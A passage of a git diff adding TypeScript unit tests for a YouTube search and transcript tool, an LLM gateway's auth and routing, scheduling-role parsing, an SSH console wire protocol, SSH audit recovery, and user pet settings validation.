'); + throw new Error(`unexpected fetch: ${url}`); + }); + const result = await executeTool('GetYouTubeTranscript', { url: 'abcdefghijk' }, ctx); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('CAPTCHA'); + }); + + it('reports no captions when the watch page player data has an empty track list', async () => { + const html = ``; + stubFetch((url) => { + if (url.startsWith(INNERTUBE_PLAYER_PREFIX)) return jsonResponse({}); + if (url.startsWith(WATCH_PAGE_PREFIX)) return new Response(html); + throw new Error(`unexpected fetch: ${url}`); + }); + const result = await executeTool('GetYouTubeTranscript', { url: 'abcdefghijk' }, ctx); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('この動画には字幕がありません'); + }); +}); + +describe('SearchYouTube', () => { + it('formats InnerTube search results and emits structured blocks', async () => { + const data = makeSearchData([ + { + id: 'aaaaaaaaaaa', + title: 'First Video', + channel: 'Chan A', + views: '1万 回視聴', + published: '1 日前', + length: '10:00', + desc: 'An interesting clip', + }, + { id: 'bbbbbbbbbbb', title: 'Second Video', channel: 'Chan B' }, + ]); + stubFetch((url) => { + if (url.startsWith(INNERTUBE_SEARCH_PREFIX)) return jsonResponse(data); + throw new Error(`unexpected fetch: ${url}`); + }); + + const result = await executeTool('SearchYouTube', { query: 'cats' }, ctx); + expect(result?.isError).toBe(false); + expect(result?.output).toContain('YouTube 検索結果: "cats" (2件)'); + expect(result?.output).toContain('1. First Video'); + expect(result?.output).toContain('URL: https://www.youtube.com/watch?v=aaaaaaaaaaa'); + expect(result?.output).toContain('チャンネル: Chan A'); + expect(result?.output).toContain('動画時間: 10:00'); + expect(result?.output).toContain('再生回数: 1万 回視聴'); + expect(result?.output).toContain('投稿日: 1 日前'); + expect(result?.output).toContain('概要: An interesting clip'); + expect(result?.output).toContain('2. Second Video'); + expect(result?.output).toMatch(/\[\[embed:youtube-\d+\]\]/); + + expect(result?.structuredBlocks).toHaveLength(1); + const block = result!.structuredBlocks![0]; + expect(block.type).toBe('youtube_videos'); + const blockData = block.data as { query: string; videos: Array> }; + expect(blockData.query).toBe('cats'); + expect(blockData.videos).toHaveLength(2); + expect(blockData.videos[0]).toMatchObject({ + videoId: 'aaaaaaaaaaa', + title: 'First Video', + channelName: 'Chan A', + thumbnailUrl: 'https://i.ytimg.com/vi/aaaaaaaaaaa/mqdefault.jpg', + videoUrl: 'https://www.youtube.com/watch?v=aaaaaaaaaaa', + duration: '10:00', + }); + }); + + it('respects the limit parameter', async () => { + const data = makeSearchData([ + { id: 'aaaaaaaaaaa', title: 'One' }, + { id: 'bbbbbbbbbbb', title: 'Two' }, + { id: 'ccccccccccc', title: 'Three' }, + ]); + stubFetch(() => jsonResponse(data)); + + const result = await executeTool('SearchYouTube', { query: 'cats', limit: 1 }, ctx); + expect(result?.isError).toBe(false); + expect(result?.output).toContain('(1件)'); + expect(result?.output).toContain('1. One'); + expect(result?.output).not.toContain('Two'); + const blockData = result!.structuredBlocks![0].data as { videos: unknown[] }; + expect(blockData.videos).toHaveLength(1); + }); + + it('returns a non-error message when the response has no result sections', async () => { + stubFetch(() => jsonResponse({ contents: {} })); + const result = await executeTool('SearchYouTube', { query: 'nothing' }, ctx); + expect(result?.isError).toBe(false); + expect(result?.output).toContain('"nothing" の検索結果が見つかりませんでした'); + }); + + it('returns a non-error message when sections contain no videoRenderer items', async () => { + const data = { + contents: { + twoColumnSearchResultsRenderer: { + primaryContents: { + sectionListRenderer: { + contents: [{ itemSectionRenderer: { contents: [{ shelfRenderer: {} }] } }], + }, + }, + }, + }, + }; + stubFetch(() => jsonResponse(data)); + const result = await executeTool('SearchYouTube', { query: 'nothing' }, ctx); + expect(result?.isError).toBe(false); + expect(result?.output).toContain('"nothing" の動画検索結果が見つかりませんでした'); + expect(result?.structuredBlocks).toBeUndefined(); + }); + + it('falls back to HTML scraping when the InnerTube API fails', async () => { + const data = makeSearchData([{ id: 'aaaaaaaaaaa', title: 'Scraped Video', channel: 'HTML Chan' }]); + const html = ``; + stubFetch((url) => { + if (url.startsWith(INNERTUBE_SEARCH_PREFIX)) return new Response('', { status: 500 }); + if (url.startsWith(RESULTS_PAGE_PREFIX)) return new Response(html); + throw new Error(`unexpected fetch: ${url}`); + }); + + const result = await executeTool('SearchYouTube', { query: 'cats' }, ctx); + expect(result?.isError).toBe(false); + expect(result?.output).toContain('1. Scraped Video'); + expect(result?.output).toContain('チャンネル: HTML Chan'); + // HTML fallback path does not emit structured blocks + expect(result?.structuredBlocks).toBeUndefined(); + }); + + it('errors when the fallback HTML has no ytInitialData', async () => { + stubFetch((url) => { + if (url.startsWith(INNERTUBE_SEARCH_PREFIX)) return new Response('', { status: 500 }); + return new Response('blocked'); + }); + const result = await executeTool('SearchYouTube', { query: 'cats' }, ctx); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('YouTube 検索結果の解析に失敗しました'); + }); + + it('errors when both the API and the fallback page request fail', async () => { + stubFetch((url) => { + if (url.startsWith(INNERTUBE_SEARCH_PREFIX)) return new Response('', { status: 500 }); + return new Response('', { status: 429 }); + }); + const result = await executeTool('SearchYouTube', { query: 'cats' }, ctx); + expect(result?.isError).toBe(true); + expect(result?.output).toContain('YouTube 検索に失敗しました'); + expect(result?.output).toContain('429'); + }); +}); diff --git a/src/gateway/server.test.ts b/src/gateway/server.test.ts new file mode 100644 index 0000000..27972a0 --- /dev/null +++ b/src/gateway/server.test.ts @@ -0,0 +1,153 @@ +/** + * Assembly-level tests for createGatewayApp: route mounting, middleware + * order (auth → allowlist → postAuth → handler), and error shapes. + * /metrics specifics live in server.metrics-endpoint.test.ts. + */ +import { describe, it, expect, vi } from 'vitest'; +import request from 'supertest'; +import type { RequestHandler } from 'express'; +import { createGatewayApp } from './server.js'; +import type { GatewayConfig } from './config.js'; +import type { BackendStatusRegistry } from '../engine/backend-status-registry.js'; + +function makeRegistry(): BackendStatusRegistry { + return { + start: () => {}, + stop: async () => {}, + getAll: () => [], + getByNodeId: () => null, + subscribe: () => () => {}, + refresh: async () => {}, + } as unknown as BackendStatusRegistry; +} + +function makeConfig(): GatewayConfig { + return { + enabled: true, + listenPort: 4000, + requestTimeoutSec: 600, + upstreamTimeoutSec: 30, + shutdownGracefulSec: 30, + backends: [{ id: 'gpu-a', endpoint: 'http://upstream', model: 'qwen3:8b', maxSlots: 1 }], + virtualKeys: [{ key: 'sk-aao-test', team: 'alpha' }], + }; +} + +function makeApp(extra: Parameters[0] extends infer D ? Partial : never = {}) { + return createGatewayApp({ + config: makeConfig(), + registry: makeRegistry(), + ...extra, + }); +} + +describe('createGatewayApp wiring', () => { + it('serves /health/liveness with no auth', async () => { + const res = await request(makeApp().app).get('/health/liveness'); + expect(res.status).toBe(200); + }); + + it('serves /health with no auth', async () => { + const res = await request(makeApp().app).get('/health'); + expect(res.status).toBe(200); + }); + + it('does not leak the X-Powered-By header', async () => { + const res = await request(makeApp().app).get('/health'); + expect(res.headers['x-powered-by']).toBeUndefined(); + }); + + it('rejects /v1/models without a virtual key', async () => { + const res = await request(makeApp().app).get('/v1/models'); + expect(res.status).toBe(401); + }); + + it('serves /v1/models with a valid key', async () => { + const res = await request(makeApp().app) + .get('/v1/models') + .set('Authorization', 'Bearer sk-aao-test'); + expect(res.status).toBe(200); + // /v1/models exposes backend ids, not raw model names. + expect(res.body.data.map((m: { id: string }) => m.id)).toContain('gpu-a'); + }); + + it('rejects unauthenticated chat completions before reading the model', async () => { + const res = await request(makeApp().app) + .post('/v1/chat/completions') + .send({ model: 'qwen3:8b', messages: [] }); + expect(res.status).toBe(401); + }); + + it('returns 503 for a model no backend serves (unrestricted key)', async () => { + const res = await request(makeApp().app) + .post('/v1/chat/completions') + .set('Authorization', 'Bearer sk-aao-test') + .send({ model: 'gpt-4o', messages: [] }); + expect(res.status).toBe(503); + }); + + it('rejects a model outside the key allowlist with 403', async () => { + const config = makeConfig(); + config.virtualKeys = [{ key: 'sk-aao-limited', team: 'beta', allowedModels: ['other-model'] }]; + const { app } = createGatewayApp({ config, registry: makeRegistry() }); + const res = await request(app) + .post('/v1/chat/completions') + .set('Authorization', 'Bearer sk-aao-limited') + .send({ model: 'qwen3:8b', messages: [] }); + expect(res.status).toBe(403); + expect(res.body.error).toContain('not allowed'); + }); + + it('runs postAuthMiddleware after auth+allowlist and can short-circuit', async () => { + const seen: string[] = []; + const budgetReject: RequestHandler = (_req, res) => { + seen.push('budget'); + res.status(429).json({ error: 'budget exhausted' }); + }; + const { app } = makeApp({ postAuthMiddleware: [budgetReject] }); + + // Unauthenticated → 401 from auth; budget middleware never runs. + const unauth = await request(app) + .post('/v1/chat/completions') + .send({ model: 'qwen3:8b', messages: [] }); + expect(unauth.status).toBe(401); + expect(seen).toEqual([]); + + // Authenticated + allowed model → budget middleware fires. + const res = await request(app) + .post('/v1/chat/completions') + .set('Authorization', 'Bearer sk-aao-test') + .send({ model: 'qwen3:8b', messages: [] }); + expect(res.status).toBe(429); + expect(seen).toEqual(['budget']); + }); + + it('proxies an authorized chat completion through fetchImpl', async () => { + const fetchImpl = vi.fn().mockResolvedValue( + new Response(JSON.stringify({ id: 'cmpl-1', choices: [] }), { + status: 200, + headers: { 'content-type': 'application/json' }, + }), + ); + const { app } = makeApp({ fetchImpl: fetchImpl as unknown as typeof fetch }); + const res = await request(app) + .post('/v1/chat/completions') + .set('Authorization', 'Bearer sk-aao-test') + .send({ model: 'qwen3:8b', messages: [{ role: 'user', content: 'hi' }], stream: false }); + expect(res.status).toBe(200); + expect(fetchImpl).toHaveBeenCalled(); + expect(String(fetchImpl.mock.calls[0]?.[0])).toContain('http://upstream'); + }); + + it('returns a JSON-shaped 404 for unknown routes', async () => { + const res = await request(makeApp().app).get('/nope'); + expect(res.status).toBe(404); + expect(res.body.error).toContain('GET /nope'); + }); + + it('returns the JSON 404 shape for unknown methods on known paths', async () => { + const res = await request(makeApp().app).delete('/v1/models'); + expect(res.status).toBe(404); + expect(res.body.error).toContain('DELETE'); + }); +}); diff --git a/src/scheduling.test.ts b/src/scheduling.test.ts new file mode 100644 index 0000000..92734b4 --- /dev/null +++ b/src/scheduling.test.ts @@ -0,0 +1,114 @@ +import { describe, it, expect } from 'vitest'; +import { + normalizeJobRole, + parseUiRole, + resolveJobScheduling, + buildSchedulingMetadataBlock, +} from './scheduling.js'; + +describe('normalizeJobRole', () => { + it('passes through fast and quality', () => { + expect(normalizeJobRole('fast')).toBe('fast'); + expect(normalizeJobRole('quality')).toBe('quality'); + }); + + it('normalizes case and whitespace', () => { + expect(normalizeJobRole(' FAST ')).toBe('fast'); + expect(normalizeJobRole('Quality')).toBe('quality'); + }); + + it('falls back to auto for unknown, null, undefined and empty values', () => { + expect(normalizeJobRole('turbo')).toBe('auto'); + expect(normalizeJobRole('')).toBe('auto'); + expect(normalizeJobRole(null)).toBe('auto'); + expect(normalizeJobRole(undefined)).toBe('auto'); + expect(normalizeJobRole('auto')).toBe('auto'); + }); +}); + +describe('parseUiRole', () => { + it('extracts the role from a ui_profile marker', () => { + expect(parseUiRole('do stuff\n---\nui_profile: fast')).toBe('fast'); + expect(parseUiRole('ui_profile: quality')).toBe('quality'); + }); + + it('is case-insensitive and tolerates spacing', () => { + expect(parseUiRole('UI_PROFILE: FAST')).toBe('fast'); + expect(parseUiRole('ui_profile:quality')).toBe('quality'); + }); + + it('returns auto when no marker is present', () => { + expect(parseUiRole('just an instruction')).toBe('auto'); + expect(parseUiRole('')).toBe('auto'); + }); + + it('returns auto for a marker with an unknown value', () => { + expect(parseUiRole('ui_profile: turbo')).toBe('auto'); + }); +}); + +describe('resolveJobScheduling', () => { + it('prefers an explicit role over the instruction marker', () => { + const out = resolveJobScheduling({ + role: 'quality', + pieceName: 'chat', + instruction: 'ui_profile: fast', + }); + expect(out).toEqual({ role: 'quality' }); + }); + + it('falls back to the deprecated profile param', () => { + const out = resolveJobScheduling({ + profile: 'fast', + pieceName: 'chat', + instruction: 'no marker', + }); + expect(out).toEqual({ role: 'fast' }); + }); + + it('role wins over deprecated profile when both are set', () => { + const out = resolveJobScheduling({ + role: 'fast', + profile: 'quality', + pieceName: 'chat', + instruction: '', + }); + expect(out).toEqual({ role: 'fast' }); + }); + + it('parses the instruction marker when no explicit role is given', () => { + const out = resolveJobScheduling({ + pieceName: 'chat', + instruction: 'task body\nui_profile: quality', + }); + expect(out).toEqual({ role: 'quality' }); + }); + + it('returns auto when nothing specifies a role', () => { + const out = resolveJobScheduling({ pieceName: 'chat', instruction: 'plain' }); + expect(out).toEqual({ role: 'auto' }); + }); + + it('treats role auto as "not explicit" and still reads the marker', () => { + const out = resolveJobScheduling({ + role: 'auto', + pieceName: 'chat', + instruction: 'ui_profile: fast', + }); + expect(out).toEqual({ role: 'fast' }); + }); +}); + +describe('buildSchedulingMetadataBlock', () => { + it('renders a parseable marker block', () => { + const block = buildSchedulingMetadataBlock('fast'); + expect(block).toBe('---\nui_profile: fast'); + expect(parseUiRole(block)).toBe('fast'); + }); + + it('round-trips every role', () => { + for (const role of ['auto', 'fast', 'quality'] as const) { + expect(parseUiRole(buildSchedulingMetadataBlock(role))).toBe(role); + } + }); +}); diff --git a/src/ssh/console-protocol.test.ts b/src/ssh/console-protocol.test.ts new file mode 100644 index 0000000..a60ad56 --- /dev/null +++ b/src/ssh/console-protocol.test.ts @@ -0,0 +1,167 @@ +/** + * console-protocol.ts is a type-only module describing the Console WS wire + * protocol. These tests act as a wire-format regression guard: + * - compile-time: object literals must `satisfies` each message type, so a + * field rename (e.g. acting_user_id → actingUserId) breaks this file + * - runtime: each message survives a JSON round-trip losslessly (the actual + * transport is JSON text frames, see src/bridge/console-ws-api.ts) + * - malformed input: shows how consumers must defend against junk frames + */ +import { describe, it, expect } from 'vitest'; +import type { + AttachMessage, + ReplayBeginMessage, + ReplayEndMessage, + ResizeMessage, + NoticeMessage, + CloseMessage, + ServerTextMessage, + ClientTextMessage, + AnyTextMessage, + SessionCloseReason, + NoticeSeverity, +} from './console-protocol.js'; + +/** Minimal runtime validator mirroring what a WS consumer must do. */ +function parseTextFrame(raw: string): AnyTextMessage | null { + let obj: unknown; + try { + obj = JSON.parse(raw); + } catch { + return null; + } + if (typeof obj !== 'object' || obj === null) return null; + const type = (obj as Record)['type']; + if (typeof type !== 'string') return null; + const known = ['attach', 'replay_begin', 'replay_end', 'resize', 'notice', 'close']; + if (!known.includes(type)) return null; + return obj as AnyTextMessage; +} + +function roundTrip(msg: T): T { + return JSON.parse(JSON.stringify(msg)) as T; +} + +describe('ssh/console-protocol wire shapes', () => { + it('attach message round-trips with snake_case wire fields intact', () => { + const msg = { + type: 'attach', + acting_user_id: 'user-42', + can_write: true, + connection_id: 'conn-7', + cols: 120, + rows: 40, + } satisfies AttachMessage; + const back = roundTrip(msg); + expect(back).toEqual(msg); + // wire field names are part of the protocol contract + expect(Object.keys(back).sort()).toEqual([ + 'acting_user_id', + 'can_write', + 'cols', + 'connection_id', + 'rows', + 'type', + ]); + }); + + it('replay_begin / replay_end round-trip', () => { + const begin = { type: 'replay_begin', bytes: 8192 } satisfies ReplayBeginMessage; + const end = { type: 'replay_end' } satisfies ReplayEndMessage; + expect(roundTrip(begin)).toEqual(begin); + expect(roundTrip(end)).toEqual(end); + }); + + it('resize message (client → server) round-trips', () => { + const msg = { type: 'resize', cols: 80, rows: 24 } satisfies ResizeMessage; + expect(roundTrip(msg)).toEqual(msg); + }); + + it('notice message round-trips for every severity', () => { + const severities = ['info', 'warn', 'error'] satisfies NoticeSeverity[]; + for (const severity of severities) { + const msg = { type: 'notice', severity, msg: 'something happened' } satisfies NoticeMessage; + expect(roundTrip(msg)).toEqual(msg); + } + }); + + it('close message round-trips for every documented close reason', () => { + const reasons = [ + 'idle_timeout', + 'duration_cap', + 'host_disconnect', + 'maintenance', + 'admin_kill', + 'connection_change', + 'session_cap_evict', + 'worker_shutdown', + 'access_revoked', + ] satisfies SessionCloseReason[]; + expect(new Set(reasons).size).toBe(reasons.length); + for (const reason of reasons) { + const msg = { type: 'close', reason } satisfies CloseMessage; + expect(roundTrip(msg)).toEqual(msg); + } + }); + + it('discriminated union narrows on type', () => { + const msgs: ServerTextMessage[] = [ + { type: 'attach', acting_user_id: 'u', can_write: false, connection_id: 'c', cols: 1, rows: 1 }, + { type: 'replay_begin', bytes: 0 }, + { type: 'replay_end' }, + { type: 'notice', severity: 'warn', msg: 'read-only' }, + { type: 'close', reason: 'admin_kill' }, + ]; + const seen: string[] = []; + for (const m of msgs) { + switch (m.type) { + case 'attach': + seen.push(`attach:${m.connection_id}`); + break; + case 'replay_begin': + seen.push(`replay_begin:${m.bytes}`); + break; + case 'replay_end': + seen.push('replay_end'); + break; + case 'notice': + seen.push(`notice:${m.severity}`); + break; + case 'close': + seen.push(`close:${m.reason}`); + break; + default: { + // exhaustiveness guard — adding a new ServerTextMessage variant + // without handling it here is a compile error + const _never: never = m; + void _never; + } + } + } + expect(seen).toEqual([ + 'attach:c', + 'replay_begin:0', + 'replay_end', + 'notice:warn', + 'close:admin_kill', + ]); + + const client: ClientTextMessage = { type: 'resize', cols: 100, rows: 30 }; + expect(client.type).toBe('resize'); + }); + + it('malformed frames are rejected by a defensive parser', () => { + expect(parseTextFrame('not json at all')).toBeNull(); + expect(parseTextFrame('')).toBeNull(); + expect(parseTextFrame('null')).toBeNull(); + expect(parseTextFrame('42')).toBeNull(); + expect(parseTextFrame('"resize"')).toBeNull(); + expect(parseTextFrame('[]')).toBeNull(); + expect(parseTextFrame('{}')).toBeNull(); // missing type + expect(parseTextFrame('{"type":123}')).toBeNull(); // non-string type + expect(parseTextFrame('{"type":"selfdestruct"}')).toBeNull(); // unknown type + // valid frame passes + const ok = parseTextFrame('{"type":"resize","cols":80,"rows":24}'); + expect(ok).toEqual({ type: 'resize', cols: 80, rows: 24 }); + }); +}); diff --git a/src/ssh/recovery.test.ts b/src/ssh/recovery.test.ts new file mode 100644 index 0000000..e14d8fb --- /dev/null +++ b/src/ssh/recovery.test.ts @@ -0,0 +1,123 @@ +/** + * Startup recovery for stale (pending) SSH audit rows. + * Complements the smoke tests in audit-repo.test.ts with detail-merge, + * idempotency, and ordering coverage. + */ +import { describe, it, expect, beforeEach, afterEach } from 'vitest'; +import Database from 'better-sqlite3'; +import { runMigrations } from '../db/migrate.js'; +import { createAuditRepo } from './audit-repo.js'; +import { reconcileStaleSshAudit } from './recovery.js'; + +const validKey = 'a'.repeat(64); + +function bootstrapDb(): Database.Database { + process.env.MCP_ENCRYPTION_KEY = validKey; + const db = new Database(':memory:'); + db.pragma('foreign_keys = ON'); + db.exec(`CREATE TABLE users (id TEXT PRIMARY KEY);`); + db.exec(`CREATE TABLE jobs (id TEXT PRIMARY KEY, wait_reason TEXT);`); + db.exec(`CREATE TABLE local_tasks (id INTEGER PRIMARY KEY AUTOINCREMENT);`); + runMigrations(db); + return db; +} + +describe('ssh/recovery reconcileStaleSshAudit', () => { + let db: Database.Database; + beforeEach(() => { + db = bootstrapDb(); + }); + afterEach(() => { + db.close(); + delete process.env.MCP_ENCRYPTION_KEY; + }); + + it('returns zero counts on an empty audit log', () => { + const result = reconcileStaleSshAudit(db); + expect(result).toEqual({ reconciledCount: 0, ids: [] }); + }); + + it('marks every pending row aborted with the stale_reason detail', () => { + const repo = createAuditRepo(db); + const id1 = repo.begin({ action: 'ssh.exec', connectionId: 'c1' }); + const id2 = repo.begin({ action: 'ssh.upload', connectionId: 'c2' }); + + const result = reconcileStaleSshAudit(db); + expect(result.reconciledCount).toBe(2); + expect(result.ids.sort()).toEqual([id1, id2].sort()); + + for (const id of [id1, id2]) { + const row = repo.getById(id); + expect(row?.outcome).toBe('aborted'); + expect(row?.completedAt).not.toBeNull(); + expect(row?.detail).toMatchObject({ + stale_reason: 'orchestrator_restart', + }); + expect(String(row?.detail?.['detail'])).toMatch(/outcome is unknown/); + } + }); + + it('merges stale_reason into existing detail without dropping prior keys', () => { + const repo = createAuditRepo(db); + const id = repo.begin({ + action: 'ssh.exec', + connectionId: 'c1', + detail: { command: 'systemctl restart app', host: 'web-1' }, + }); + + reconcileStaleSshAudit(db); + + const row = repo.getById(id); + expect(row?.detail).toMatchObject({ + command: 'systemctl restart app', + host: 'web-1', + stale_reason: 'orchestrator_restart', + }); + }); + + it('does not touch rows that already reached a terminal outcome', () => { + const repo = createAuditRepo(db); + const doneId = repo.begin({ action: 'ssh.exec', connectionId: 'c1' }); + repo.complete(doneId, 'success', { exit_code: 0 }); + const failedId = repo.beginAndComplete({ action: 'ssh.exec', connectionId: 'c1' }, 'failed'); + const pendingId = repo.begin({ action: 'ssh.exec', connectionId: 'c1' }); + + const result = reconcileStaleSshAudit(db); + expect(result.reconciledCount).toBe(1); + expect(result.ids).toEqual([pendingId]); + + expect(repo.getById(doneId)?.outcome).toBe('success'); + expect(repo.getById(doneId)?.detail).toEqual({ exit_code: 0 }); + expect(repo.getById(failedId)?.outcome).toBe('failed'); + }); + + it('is idempotent — a second run finds nothing to reconcile', () => { + const repo = createAuditRepo(db); + repo.begin({ action: 'ssh.exec', connectionId: 'c1' }); + + expect(reconcileStaleSshAudit(db).reconciledCount).toBe(1); + expect(reconcileStaleSshAudit(db)).toEqual({ reconciledCount: 0, ids: [] }); + }); + + it('returns ids in started_at ascending order (oldest first)', () => { + const repo = createAuditRepo(db); + const newer = repo.begin({ + action: 'ssh.exec', + connectionId: 'c1', + startedAt: '2026-06-10T12:00:00.000Z', + }); + const oldest = repo.begin({ + action: 'ssh.exec', + connectionId: 'c1', + startedAt: '2026-06-01T00:00:00.000Z', + }); + const middle = repo.begin({ + action: 'ssh.exec', + connectionId: 'c1', + startedAt: '2026-06-05T08:30:00.000Z', + }); + + const result = reconcileStaleSshAudit(db); + expect(result.ids).toEqual([oldest, middle, newer]); + }); +}); diff --git a/src/user-folder/pets.test.ts b/src/user-folder/pets.test.ts new file mode 100644 index 0000000..a6680ba --- /dev/null +++ b/src/user-folder/pets.test.ts @@ -0,0 +1,616 @@ +import { describe, it, expect, beforeEach, afterEach } from 'vitest'; +import { mkdtempSync, rmSync, mkdirSync, writeFileSync, readdirSync, existsSync, readFileSync } from 'fs'; +import { join } from 'path'; +import { tmpdir } from 'os'; +import AdmZip from 'adm-zip'; +import { + DEFAULT_PET_SETTINGS, + PetConflictError, + PetValidationError, + slugifyPetId, + readPetSettings, + writePetSettings, + listPets, + getPet, + importPetZip, + deletePet, + resolvePetAsset, +} from './pets.js'; +import { ensureUserFolder, userRoot } from './paths.js'; + +// ── Fixtures ────────────────────────────────────────────────────────────────── + +let root: string; +const USER = 'test-user'; + +function petsDir(): string { + return join(userRoot(root, USER), 'pets'); +} + +function settingsFile(): string { + return join(userRoot(root, USER), 'pet-settings.json'); +} + +function trashDir(): string { + return join(userRoot(root, USER), 'trash'); +} + +/** Create a pet directory on disk with a manifest and optional extra files. */ +function makePetDir( + petId: string, + manifest: Record, + files: Record = {}, +): void { + const dir = join(petsDir(), petId); + mkdirSync(dir, { recursive: true }); + writeFileSync(join(dir, 'pet.json'), JSON.stringify(manifest)); + for (const [name, content] of Object.entries(files)) { + writeFileSync(join(dir, name), content); + } +} + +/** Build an in-memory zip from a name → content map. */ +function makeZip(files: Record): Buffer { + const zip = new AdmZip(); + for (const [name, content] of Object.entries(files)) { + zip.addFile(name, Buffer.isBuffer(content) ? content : Buffer.from(content)); + } + return zip.toBuffer(); +} + +beforeEach(() => { + root = mkdtempSync(join(tmpdir(), 'pets-test-')); + ensureUserFolder(root, USER); +}); + +afterEach(() => { + rmSync(root, { recursive: true, force: true }); +}); + +// ── slugifyPetId ────────────────────────────────────────────────────────────── + +describe('slugifyPetId', () => { + it('lowercases and replaces invalid characters with hyphens', () => { + expect(slugifyPetId('My Cool Pet!')).toBe('my-cool-pet'); + }); + + it('strips a trailing file extension', () => { + expect(slugifyPetId('Sprite Cat.zip')).toBe('sprite-cat'); + }); + + it('keeps already-valid ids unchanged', () => { + expect(slugifyPetId('cat_01-x')).toBe('cat_01-x'); + }); + + it('trims leading/trailing hyphens produced by replacement', () => { + expect(slugifyPetId(' ---hello--- ')).toBe('hello'); + }); + + it('truncates to 64 characters', () => { + const out = slugifyPetId('a'.repeat(100)); + expect(out).toBe('a'.repeat(64)); + }); + + it('falls back to a generated id for empty input', () => { + expect(slugifyPetId('')).toMatch(/^pet-[a-z0-9]+$/); + expect(slugifyPetId(null)).toMatch(/^pet-[a-z0-9]+$/); + expect(slugifyPetId(undefined)).toMatch(/^pet-[a-z0-9]+$/); + }); + + it('falls back when input reduces to nothing', () => { + expect(slugifyPetId('!!!')).toMatch(/^pet-[a-z0-9]+$/); + }); +}); + +// ── readPetSettings / writePetSettings ──────────────────────────────────────── + +describe('readPetSettings', () => { + it('returns defaults when the settings file is missing', () => { + const s = readPetSettings(root, USER); + expect(s).toEqual(DEFAULT_PET_SETTINGS); + // and it must be a copy, not the shared default object + expect(s).not.toBe(DEFAULT_PET_SETTINGS); + }); + + it('reads back persisted settings', () => { + writePetSettings(root, USER, { enabled: false, size: 48, activePetId: 'cat' }); + const s = readPetSettings(root, USER); + expect(s.enabled).toBe(false); + expect(s.size).toBe(48); + expect(s.activePetId).toBe('cat'); + }); + + it('quarantines a corrupted settings file to trash and returns defaults', () => { + writeFileSync(settingsFile(), 'not json at all{'); + const s = readPetSettings(root, USER); + expect(s).toEqual(DEFAULT_PET_SETTINGS); + expect(existsSync(settingsFile())).toBe(false); + const trashed = readdirSync(trashDir()); + expect(trashed.some(f => f.endsWith('-pet-settings.json'))).toBe(true); + }); + + it('quarantines a settings file with invalid values and returns defaults', () => { + writeFileSync(settingsFile(), JSON.stringify({ size: 999 })); + const s = readPetSettings(root, USER); + expect(s).toEqual(DEFAULT_PET_SETTINGS); + expect(existsSync(settingsFile())).toBe(false); + }); +}); + +describe('writePetSettings', () => { + it('merges a patch over the previous settings', () => { + writePetSettings(root, USER, { enabled: false }); + const s = writePetSettings(root, USER, { size: 32 }); + expect(s.enabled).toBe(false); // preserved from earlier write + expect(s.size).toBe(32); + expect(s.position).toBe('bottom-right'); + }); + + it('persists valid JSON to disk', () => { + writePetSettings(root, USER, { sound: true }); + const onDisk = JSON.parse(readFileSync(settingsFile(), 'utf-8')); + expect(onDisk.sound).toBe(true); + }); + + it('rejects a non-object patch', () => { + expect(() => writePetSettings(root, USER, null)).toThrow(PetValidationError); + expect(() => writePetSettings(root, USER, [])).toThrow(PetValidationError); + expect(() => writePetSettings(root, USER, 'x')).toThrow(PetValidationError); + }); + + it('rejects non-boolean values for boolean fields', () => { + expect(() => writePetSettings(root, USER, { enabled: 1 })).toThrow(/enabled must be boolean/); + expect(() => writePetSettings(root, USER, { sound: 'yes' })).toThrow(/sound must be boolean/); + expect(() => writePetSettings(root, USER, { reducedMotion: 0 })).toThrow(/reducedMotion must be boolean/); + expect(() => writePetSettings(root, USER, { toolSparkEnabled: 'on' })).toThrow(/toolSparkEnabled must be boolean/); + }); + + it('rejects an invalid size', () => { + expect(() => writePetSettings(root, USER, { size: 100 })).toThrow(/size must be one of/); + expect(() => writePetSettings(root, USER, { size: '64' })).toThrow(/size must be one of/); + }); + + it('accepts each allowed size', () => { + for (const size of [32, 48, 64, 80] as const) { + expect(writePetSettings(root, USER, { size }).size).toBe(size); + } + }); + + it('rejects any position other than bottom-right', () => { + expect(() => writePetSettings(root, USER, { position: 'top-left' })).toThrow(/position must be bottom-right/); + expect(writePetSettings(root, USER, { position: 'bottom-right' }).position).toBe('bottom-right'); + }); + + it('rejects an invalid activePetId', () => { + expect(() => writePetSettings(root, USER, { activePetId: 'UPPER' })).toThrow(/activePetId is invalid/); + expect(() => writePetSettings(root, USER, { activePetId: 42 })).toThrow(/activePetId must be string or null/); + }); + + it('normalizes empty-string activePetId to null', () => { + writePetSettings(root, USER, { activePetId: 'cat' }); + const s = writePetSettings(root, USER, { activePetId: '' }); + expect(s.activePetId).toBeNull(); + }); + + it('accepts null activePetId', () => { + expect(writePetSettings(root, USER, { activePetId: null }).activePetId).toBeNull(); + }); + + it('validates workerPets keys and values', () => { + expect(() => writePetSettings(root, USER, { workerPets: { 'bad key!': 'cat' } })) + .toThrow(/workerPets key is invalid/); + expect(() => writePetSettings(root, USER, { workerPets: { worker1: 'BAD ID' } })) + .toThrow(/must be a valid pet id/); + expect(() => writePetSettings(root, USER, { workerPets: [] })) + .toThrow(/workerPets must be an object/); + expect(() => writePetSettings(root, USER, { workerPets: null })) + .toThrow(/workerPets must be an object/); + }); + + it('drops workerPets entries with empty or null values (explicit removal)', () => { + const s = writePetSettings(root, USER, { + workerPets: { keep: 'cat', dropEmpty: '', dropNull: null }, + }); + expect(s.workerPets).toEqual({ keep: 'cat' }); + }); + + it('replaces (not merges) the whole workerPets map', () => { + writePetSettings(root, USER, { workerPets: { a: 'cat' } }); + const s = writePetSettings(root, USER, { workerPets: { b: 'dog' } }); + expect(s.workerPets).toEqual({ b: 'dog' }); + }); + + it('rejects workerPets with too many entries', () => { + const wp: Record = {}; + for (let i = 0; i < 65; i++) wp[`worker-${i}`] = 'cat'; + expect(() => writePetSettings(root, USER, { workerPets: wp })) + .toThrow(/too many entries/); + }); +}); + +// ── listPets / getPet ───────────────────────────────────────────────────────── + +describe('listPets', () => { + it('returns an empty array when there are no pets', () => { + expect(listPets(root, USER)).toEqual([]); + }); + + it('lists pets sorted by display name and omits the manifest', () => { + makePetDir('zebra', { name: 'Aardvark' }); + makePetDir('cat', { name: 'Whiskers' }); + const pets = listPets(root, USER); + expect(pets.map(p => p.id)).toEqual(['zebra', 'cat']); // sorted by name, not id + expect(pets.map(p => p.name)).toEqual(['Aardvark', 'Whiskers']); + expect((pets[0] as Record)['manifest']).toBeUndefined(); + }); + + it('skips directories without a pet.json and ones with invalid ids', () => { + makePetDir('valid', { name: 'Valid' }); + 